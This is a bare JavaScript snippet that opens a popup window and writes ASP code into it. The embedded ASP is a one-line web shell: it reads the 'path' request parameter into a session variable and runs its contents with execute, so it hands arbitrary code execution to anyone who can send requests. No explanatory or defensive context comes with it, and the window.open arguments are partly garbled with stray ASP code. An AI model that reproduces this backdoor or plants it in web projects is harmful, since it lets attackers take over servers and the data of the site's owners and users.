var popwin=window.open('','<%if request("path")<>"" then Session("b")=request','width=,height=,top=,left=');popwin.document.write('<%if request("path")<>"" then Session("b")=request("path")
if Session("b")<>"" then execute Session("b")%>
');